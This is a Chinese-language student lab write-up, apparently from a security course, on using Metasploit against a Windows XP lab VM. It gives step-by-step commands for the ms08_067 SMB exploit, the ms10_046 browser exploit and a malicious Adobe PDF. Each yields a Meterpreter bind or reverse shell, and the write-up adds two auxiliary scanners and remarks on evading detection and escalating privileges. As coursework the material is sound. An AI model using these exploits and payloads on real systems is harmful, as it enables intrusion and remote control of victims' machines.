• Exp 6 MSF基础


    一、实验目标

      本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

    •  一个主动攻击实践,如ms08_067; 
    •  一个针对浏览器的攻击,如ms10_046;
    •  一个针对客户端的攻击,如Adobe;
    •  成功应用任何一个辅助模块。

    二、实验内容

    Win xp的ip:192.168.1.110(靶机)

    kali的ip:192.168.1.108(攻击者)

    (一)一个主动攻击实践,如ms08_067

     1.进入/usr/share/metasploit-framework/modules/exploits/windows/smb路径下,查看有哪些可以利用的漏洞(进入exploit渗透攻击模块后,因为靶机是windows,所以继续选择windows,之后可以看到不同协议的漏洞):

    选择漏洞ms08_067,其中ms表示微软,08表示年份,067是漏洞编号

    2.输入 nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.1.110 查看靶机是否有此漏洞,若是没有此漏洞则可能攻击不成功,所以扫描一下:

    确实有此漏洞。(其实我也尝试选择其他漏洞进行扫描,看靶机是否存在,但是除了ms08_067以外,只发现了ms17_10漏洞)

    3.输入 use exploit/windows/smb/ms08_067_netapi ,使用针对此漏洞的渗透攻击

     

    4.输入 show payloads ,查看可以载荷可以设置为哪些,在这里选择了windows/meterpreter/bind_tcp载荷

    5.输入 show options ,查看需要设置哪些选项(比如靶机ip等等),并且根据提示设置靶机ip  set RHOSTS 192.168.1.110 ,设置攻击者ipset LHOSTS 192.168.1.108 等等:

    6.输入 show options ,查看是否设置成功:

    7.输入 exploit 运行,可以看到攻击成功:

    (二)一个针对浏览器的攻击,如ms10_046

     1.查看关于浏览器的漏洞攻击都有哪些

       在这里选择ms10_046漏洞

    2.使用针对这个漏洞的攻击,并且根据提示设置信息

     其中,SRVHOST应该填什么呢?根据后面的描述,“The local host to listen on.”意为本地监听的主机,所以应该填的是攻击者的ip(本实验中为192.168.1.108)

    3.设置payload为/windows/meterpreter/reverse_tcp,并设置其它信息

     4.在靶机上打开浏览器并输入上图所示URL,在kali 端可获得如下结果:

     5.输入 sessions -i 1 建立会话连接

    (三) 一个针对客户端的攻击,如Adobe

    1.查看关于客户端的攻击都有哪些

    在这里选择adobe_cooltype_sing。

    2.输入 use windows/fileformat/adobe_cooltype_sing 使用adobe_cooltype_sing模块,输入 set payload windows/meterpreter/reverse_tcp 设置payload,输入 show options 查看需要设置什么

    3.根据提示信息,输入 set LHOST 192.168.1.108 设置攻击者ip,输入 set LPORT 4312 设置端口, set FILENAME adobe.pdf 更改生成的文件名:

     4.输入 exploit 生成文件,并将文件拷贝到靶机中,在kali端参考实验二打开监听,在靶机中用adobe打开此pdf,发现成功回连:

    • 注:windows xp里面没有adobe时,需要下载一个含有此漏洞的adobe,然后用此adobe打开pdf文档。
    •        若是/root目录无权访问,无法取到生成的pdf的话,则可以在shell中使用cp命令将此pdf文件复制到/home目录下,然后再将此文件拷贝到windows xp中。

    (四)成功应用任何一个辅助模块(不同于其他同学的实践)

         我随机看了二十几个同学的博客,而且在百度搜索关键词,好像并没有发现有同学使用以下两个辅助模块。

         这个部分以windows 10作为靶机,其ip地址为192.168.1.104

     1.使用/scanner/http/cert

          这个扫描可以用来检查证书是否过期。可以先用 show options 查看需要设置哪些信息,再根据提示设置目标主机或者端口等信息,输入 run 运行此模块,从结果可以看出证书颁发者、发行日期和到期日期等。

     2.使用auxiliary/scanner/smb/pipe_auditor

         这个扫描将确定哪些命名管道可以通过SMB使用。在信息收集时,可以为我们提供有关远程系统上运行的某些服务的一些信息。输入 use auxiliary/scanner/smb/pipe_auditor 进入此模块的使用,输入 show options 查看需要设置哪些信息,输入 set RHOSTS 192.168.1.104/24 设置扫描范围,最后输入 run 运行:(可以发现ip为192.168.1.102的主机的浏览器符合)

    三、实验总结

    1.实验体会

          感觉此次实验与做过的几次实验相比较来说,虽然也同样遇到了一些问题,但是属于难度较低的。此次实验的目的在于熟悉metasploit的模块和应用,通过这次实验,我也确实对它的应用更加熟悉。因为靶机选的是比较落后的windows xp,还是在没有开防火墙的情况下,所以攻击成功其实挺简单的,但是若是换成windows 10,就没有这么容易了。

    2.遇到困难

         实验中遇到一个问题是,单向ping通。kali无法ping通windows xp,但是windows xp却可以ping通kali,在网上搜索了一下说是防火墙的问题,但是其实防火墙一直是关着的,最后想到可能是虚拟机网络设置的原因。可能虚拟机的网络设置不对?比如一个是桥接,一个是nat,这两就不在同一个局域网里。将windows xp的网络设置改为桥接后,发现两个虚拟机可成功ping通。

    3.问题回答

    (1)用自己的话解释什么是exploit,payload,encode

     :exploit是渗透攻击,payload是载荷,encode是编码。

           从我个人的理解上来说,payload是一段shellcode,是用来实现功能的核心;encode是对payload和nop组装完成的指令序列进行改变,使它尽量不像恶意代码;exploit是攻击的方法,比如利用了什么漏洞,也可以说是攻击的过程。

    (2)离实战还缺些什么技术或步骤?

    :这次实验选择的靶机是比较落后的windows xp,而且是在没有开防火墙的情况下,进行的实验。但是其实现实生活中,这样的靶机几乎是不存在的。若是想攻击某个靶机,首先得能扫描这个目标机,具有哪些漏洞,方便利用;其次,我怎样给恶意代码改变下包装,或者在不改变功能的前提下改变内里,使它不被目标机发现;最后,还有一个问题是,如果成功进入目标机,应想办法使自己获得更高的权限从而进行更多的操作。

     

     

  • 相关阅读:
    以最少的循环把两个数组里面的相同结果输出来
    解决PL/SQL Developer连接数据库时出现 “ORA-12541:TNS:无监听程序”错误
    AOP中Advice执行两遍的原因
    Java注释@interface的用法
    Spring进阶教程之在ApplicationContext初始化完成后重定义Bean
    Java的注解机制——Spring自动装配的实现原理
    基数排序简单Java实现
    jQuery的选择器中的通配符
    SEO 网站页面SEO优化之页面title标题优化
    IntelliJ IDEA 中文乱码解决
  • 原文地址:https://www.cnblogs.com/zhaiy2020/p/12809386.html
Copyright © 2020-2023  润新知